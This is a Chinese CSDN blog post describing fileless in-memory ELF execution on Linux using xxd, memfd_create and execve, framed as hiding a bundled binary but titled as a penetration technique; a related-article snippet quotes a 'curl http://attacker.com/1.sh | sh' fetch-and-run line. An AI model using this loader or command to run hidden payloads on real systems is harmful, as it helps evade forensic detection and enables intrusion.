Linux无文件渗透执行elf方式

最新推荐文章于 2024-07-16 12:57:18 发布
最新推荐文章于 2024-07-16 12:57:18 发布
阅读量723 收藏 2
点赞数
文章标签: linux c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SWX230162/article/details/127583288
版权

Linux无文件渗透执行elf方式

文章目录

概要

比如说你使用了一个开源组件,开源组件以bin的形式提供,但是你并不想直接./bin去运行它,而是想把开源bin直接集成到自己的代码中,这样对外相当于隐藏了开源bin,直接提供你自身代码的bin。这种场景可以简单应用到Linux elf in-memory execution这种方式。

方法

可以通过下面四个步骤来实现。

xxd

将你依赖的开源bin通过xxd -i生成头文件

xxd -i bin bin.h

xxd命令使用二进制或十六进制格式显示文件内容。若未指定outfile参数,则将结果显示在终端屏幕上;否则输出到outfile中。详细的用法可参考linux命令xxd。
这个头文件中有两个变量bin, bin_len。bin中保存的就是bin的十六进制数据,bin_len是bin的data长度。
eg:

unsigned char bin[] = {
...
};
unsigned int bin_len= xxx;

memfd_create

通过memfd_create创建匿名fd

int mem_fd = memfd_create("elf", MFD_CLOEXEC);
int ret = ftruncate(mem_fd, bin_len);
if (ret == -1) {
    std::cout << "ftruncate err: " << strerror(errno);
    close(mem_fd);
    return -1;
}

write

将头文件写到刚才创建的mem_fd中

ret = write(mem_fd, bin, bin_len);
if (ret == -1) {
    std::cout << "write err: ", strerror(errno);
    close(mem_fd);
    return -1;
}

execve

通过execve拉起服务

 std::string name("in-memory-bin");
 argv[0] = (char*)name.c_str();

 char cmdline[256];
 sprintf(cmdline, "/proc/self/fd/%d", mem_fd);

 if (execve(cmdline, argv, nullptr) < 0) {
   close(mem_fd);
 }
争当嫡系的程序员
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux文件渗透执行elf
whatday的专栏
08-13 1271
01—简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢?最近看了一篇@MagisterQuis写的文章h...
Linux文件木马程序渗透测试复现
永远是少年
06-15 1136
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
渗透测试之无文件渗透简单使用-windows
Testfan_zhou的博客
06-17 670
文件渗透测试工作原理:无文件恶意程序最初是由卡巴斯基在2014年发现的,一直不算是什么主流的攻击方式,直到此次事件的发生。说起来无文件恶意程序并不会为了执行而将文件文件夹复制到硬盘上,反而是将payloads直接注入正在运行程序的内存,导致恶意软件直接在系统内存中执行,也让专家很难在系统重启之后找到此恶意软件的踪迹。 在日常的渗透测试中,如果使用无文件渗透,那么也同样可以保证在执行恶意测试程序...
Linux环境无文件渗透执行ELF:memfd_create、ptrace
runshui27的博客
07-21 151
https://blog.csdn.net/Rong_Toa/article/details/109845832
“无文件”攻击方式渗透实验
weixin_33972649的博客
03-16 407
拓扑设计   拓扑介绍 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110),而且为了最基本的安全保障,web边界服务器设置了防火墙,此防火墙对外网只开放80,81,443端口,对内网开放所有端口,上面还装有杀毒软件。 内网还布置若干台web服...
linux系统内存执行elf的多种方式
whatday的专栏
08-13 1753
一、前言 无文件(fileless)恶意软件攻击现在已经越来越流行,这一点并不奇怪,因为这种技术通常不会留下蛛丝马迹。本文的重点不是介绍如何在Windows RAM中执行程序,我们的目标是GNU/LinuxLinux是服务器行业的领头羊,在上百万嵌入式设备和大多数web服务上都能看到Linux的身影。在本文中,我们将简单探讨如何在Linux系统内存中执行程序,也讨论了如何应付具有挑战性的环境。...
Linux-ELF文件详解
05-21
很详细的一份针对于elf格式文件的技术文档,对于想更深层次的了解Linux的朋友们相信会有很大帮助的
Linux系统下的ELF文件分析
08-14
总的来说,理解ELF文件格式对于深入学习Linux系统的工作原理至关重要,它涉及到编译器、链接器、动态链接器以及操作系统如何加载和执行程序等多个层面。通过分析ELF文件,我们可以更清楚地认识到程序从源码到运行的...
Linux系统典型文件格式ELF1
08-08
ELF (Executable and Linkable Format) 是 Linux 系统中广泛使用的文件格式,用于表示可执行文件、可重定位目标文件以及共享库。ELF 文件的结构严谨且复杂,允许不同类型的程序和库以一致的方式存储和处理数据。在本...
Linux系统下的ELF文件分析.pdf
09-06
ELF(Executable and Linkable Format)是一种可执行连接文件格式,目前已经成为Linux、SVR4和Solaris2.0默认的目标文件格式。理解ELF文件对理解一些重要的系统概念非常有帮助,例如程序的编译和链接、程序的加载和...
xxd (hexdump):xxd 通过生成静态 C/C++ 数组定义为 C/C++文件提供数据导出接口-matlab开发
05-30
一个简单的例子不仅仅是一个冗长的描述...... >> 数据 = uint8(rand(4,5,6)*255); >> xxd(data,'foo'); 无符号字符 foo[] = { 0x5E、0x35、0x16、0xC5、0x34、0x63、0x8D、0x3A、0xA4、0x7C、0x27、0xC7、 0x1A、0x4B、0x3D、0x87、0x17、0x67、0x1B、0x1D、0xC8、0x4A、0x9A、0xF6、 0x6E、0xB1、0xC1、0x6E、0xA7、0x1C、0xEE、0x30、0x44、0xCB、0x7C、0xC4、 0x65、0x46、0x09、0xAC、0x6E、0x73、0x9C、0x0F、0x51、0xC5、0xB2、0x20、 0x21、0x18、0x02、0x6C、0xA7、0xB8、0x87、0x1C、0xA1、0x20、0x22、0x19、
Linux下的ELF文件格式简介.pdf
09-07
ELF文件格式的数据表示方式与机器相关,有六种基本类型:无符号整数、有符号整数、无符号长整数、有符号长整数、浮点数和双精度浮点数。这些类型的宽度与机器相关,例如在32位机器上,整数类型的宽度为32位,而...
ELF文件格式分析.pdf
04-21
藤启明
linux 程序怎么执行文件格式,linux汇编之——(1)ELF:Linux执行程序文件格式
weixin_39608116的博客
05-02 101
Windows的应用程序的格式是PE格式文件LINUX的是ELF(“Executable and Linking Format”)文件格式。一个手工打造的ELF文件,代码如下:7F454C4601010100000000000000000002000300010000006000488034000000000000000000...
Linux执行elf执行文件流程
新时代农民工
07-05 561
execve族系统调用用于运行一个新的进程,并且替换当前进程的内存映像(代码,数据,栈)为新进程的内存映像。这个系统调用会在指定的进程空间内加载一个新的程序,同时将参数和环境变量传递给新程序。execve族的调用可以让用户免于开发自己的shell或者cli程序,用现有的程序交互式地对系统进行操作,甚至可以在shell中启动其他进程。由以上代码可知,execve族系统调用主要是通过elf加载器解释加载到内存,再通过修改arm的pc sp指针,使得该elf执行文件得以运行。
文件渗透实验
一个码农的笔记
03-09 4330
文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
linux中的可执行二进制文件执行流程(ELF
gzhu_flyingbird的博客
07-20 3625
LD_PRELOAD,execve,Linux
linux文件执行— fexecve 揭秘
七夜的博客
03-22 756
前言 良好的习惯是人生产生复利的有力助手。 继续2020年的flag,至少每周更一篇文章。 无文件执行 之前的文章中,我们讲到了无文件执行的方法以及混淆进程参数的方法,今天我们继续讲解一种linux上无文件执行的技巧,是后台朋友给我的提醒,万分感谢,又学到了新的东西。 linux文件执行,首先要提到两个函数:memfd_create 和 fexecve。 memfd_create ...
LINUX:懒汉单例模式线程池
最新发布
W2155的博客
07-16 490
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
linux如何执行elf文件
07-28
Linux中,执行ELF文件的过程可以通过以下步骤来描述。首先,内核会找到与文件格式对应的注册项,并调用load_binary回调函数。对于ELF文件来说,load_elf_binary()函数会被调用。\[1\]接下来,内核会进行三次字符串复制操作,分别是文件名、环境变量和参数。这些字符信息会被复制到bprm结构中,并在新的进程空间准备好后再复制到新进程中去。\[2\]然后,调用search_binary_handler()函数,根据文件头信息来识别可执行文件的格式。\[3\]最后,根据识别出的文件格式,内核会选择相应的处理程序来执行ELF文件。这个处理程序会加载ELF文件的代码和数据段,并设置相应的执行环境,最终执行ELF文件中的程序代码。 #### 引用[.reference_title] - *1* *2* *3* [Linux启动ELF执行文件的过程](https://blog.csdn.net/weixin_34417200/article/details/91585230)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值